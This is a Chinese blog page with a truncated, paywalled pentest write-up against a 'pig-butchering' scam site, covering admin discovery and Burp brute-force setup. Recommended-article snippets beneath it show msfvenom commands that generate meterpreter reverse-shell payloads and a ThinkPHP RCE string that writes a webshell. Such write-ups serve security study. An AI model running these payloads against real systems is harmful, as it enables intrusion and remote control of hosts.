【网络安全】记一次杀猪盘渗透实战

最新推荐文章于 2024-11-01 14:14:52 发布
原创 最新推荐文章于 2024-11-01 14:14:52 发布 · 1.3k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #信息安全 #网络安全 #渗透测试 #杀猪盘

看起来非常假的网站,这个网站是没有 cdn 的用的是 thinkphpk 框架搭建的。

先打一波 poc 没有效果

访问一下后台直接在 url 后面加/admin。

一个开源的 cms 还没有验证码尝试用 burp 进行爆破,首先在火狐上设置代理 ip 为 127.0.0.1 代理端口为 8081。

Burp 上也要设置端口为 8081,将 Intercept 设置为 on 输入账号密码点击登录就能拦截到数据包。

在爆破之前先发送到 Re

最低0.47元/天 解锁文章
msf生成linux elf木马反弹shell
shatianyzg的博客
06-13 1924
攻击机:Kali 192.168.241.128 靶机:centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释: inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k
MSF_PHP后门反弹连接_DVWA文件上传木马_Metasploit配置监控及msfvenom生成攻击载荷
qq_51550750的博客
06-02 1187
msf——PHP后门反弹连接
杀猪渗透测试
xj28555的博客
09-08 1356
最近偶然发现一个虚拟货币买涨跌的杀猪,遂进行了一波测试,前台长这样。 为thinkphp5.0.5随用RCE进行打入,成功写入webshell。 s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmF
一次渗透测试实战
qq_45434762的博客
11-17 1939
免责声明 本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。 因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与NowSec及分享者无关 0.起因 博主从周一到周五一直在收同一个公司发送的垃圾短信(这从短信链接中的域名可以看出),但是当博主点进网页看的时候,发现这是可以说是一家骗子网站吧。网站所卖的东西...
一次渗透之旅 ,网络安全学习至上
Karka_的博客
12-29 981
所谓“杀猪”,是指诈骗分子利用网络交友通常是“异性”交友,诱导受害人下载诈骗APP并在上面进行各种“投资”,如菠菜、股票、期货甚至虚拟货币的网络诈骗。今年某月某日小白就遭遇了这种骗局,他先是被骗子通过QQ添加并下载了一个名为”心动“的APP,在“心动“APP上结识了位名为“xx老师”的美女,小白被美色迷了眼打算相约这名网友,但是美女则借口让他下载另一个名为午夜乐园的APP进行投资,果不其然小白被成功骗取10余万。
网络安全(黑客技术)—2024自学手册
TDJYGC的博客
04-24 1470
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
web渗透实例
12-08
一次艰难的渗透纪实,不容错过,真实web入侵纪实!
网站渗透实战试验(仅供参考)
amaoatao的博客
03-10 5846
首先收集必要的信息 发现存在php探针,phpinfo,phpmyadmin 常用的垃圾弱口令登录失败。 尝试登录后台,网站使用帝国cms7.2系统 弱口令登录失败,使用网络上帝国cms的通用漏洞,行不通失败。 在知道绝对路径的情况下,dba权限的sql注入可以直接执行os-shell命令拿shell(下载帝国下来看!)。 扫描开放端口,反查域名,寻找最可能存在sql注入的网站。...
渗透实战:内网域渗透_内网渗透实例
最新发布
Galaxy_0的博客
11-01 1293
本文录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
渗透一个网站的基本步骤
weixin_64809022的博客
02-05 4130
渗透测试
一次杀猪渗透之旅
小王的储物间
07-26 578
所谓“杀猪”,是指诈骗分子利用网络交友通常是“异性”交友,诱导受害人下载诈骗APP并在上面进行各种“投资”,如菠菜、股票、期货甚至虚拟货币的网络诈骗。今年某月某日小白就遭遇了这种骗局,他先是被骗子通过QQ添加并下载了一个名为”心动“的APP,在“心动“APP上结识了位名为“xx老师”的美女,小白被美色迷了眼打算相约这名网友,但是美女则借口让他下载另一个名为午夜乐园的APP进行投资,果不其然小白被成功骗取10余万。
一次对某杀猪渗透
渗透测试研究中心
01-02 599
0x00 前言去年逛微步,本来是想找几个ip练练溯源能力,无意间发现了一个杀猪。本文打马赛克如果有漏的地方请及时指出,也请各位不要去微步上边找我这个目标复现,本case已全权交由某官方处理。0x01 简单的打点打开链接一看,一股子浓浓的“微”气息扑面而来,由于我们自己审计过这套源码,所以就直接找对应的地方打了个xss,结果呢他这竟然是微三开,没错,三开!无奈之下还是用老思路,想办法让框架报...
msfvenom基本使用
weixin_53440207的博客
02-24 480
msfvenom具体使用教程
一次针对BC杀猪渗透一条龙
渗透测试研究中心
01-05 965
0X00 歪打正着无意间碰到一套垃圾菠菜网站杀猪挨个访问能扫描出来的目录与文件发现并没有太大作用,不过发现了后台地址。phpmyadmin访问500。访问xd.php到后台访问发现还需要授权验证码试了下8888,123456之类的都提示错误,当场关闭。尝试子域名爆破也只有一个。Nmap扫描也没有什么发现。返回首页发现url有点不常见。0X01 寻找同类型网站以及源码这种搞诈骗...
kali linux中meterpreter使用前的反弹shell及其基础语法
qq_42133828的博客
12-02 8841
一.反弹shell的类型: 1.reverse_tcp  (基于TCP反向链接反弹shell) 1).在kali linux终端中,生成一个反弹shell linux版: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=你kali本机的IP lport=随便选一个端口来接收信息 -f elf -o shell 如: msfveno...
【内网安全】——msf木马生成教程
Demo不是emo的博客
01-30 6212
msfvenom生成木马教程
渗透测试 ( 4 ) --- Meterpreter 命令详解
热门推荐
freeking101的博客
07-02 1万+
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
msfvenom使用方法
wutiangui的博客
04-25 239
我们使用metasploit中的另一个后门工具msfvenom生成一个木马,方便我们测试meterpreter。
大数据助力精准打击电信网络诈骗“杀猪”研究
通过这些措施,侦查机关可以提高对电信网络诈骗犯罪的侦查效率和打击准确性,从而有效遏制“杀猪”诈骗犯罪的蔓延,保护社会的稳定和人民的财产安全。 关键词包括“大数据”,“杀猪”电信网络诈骗,侦查对策等...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值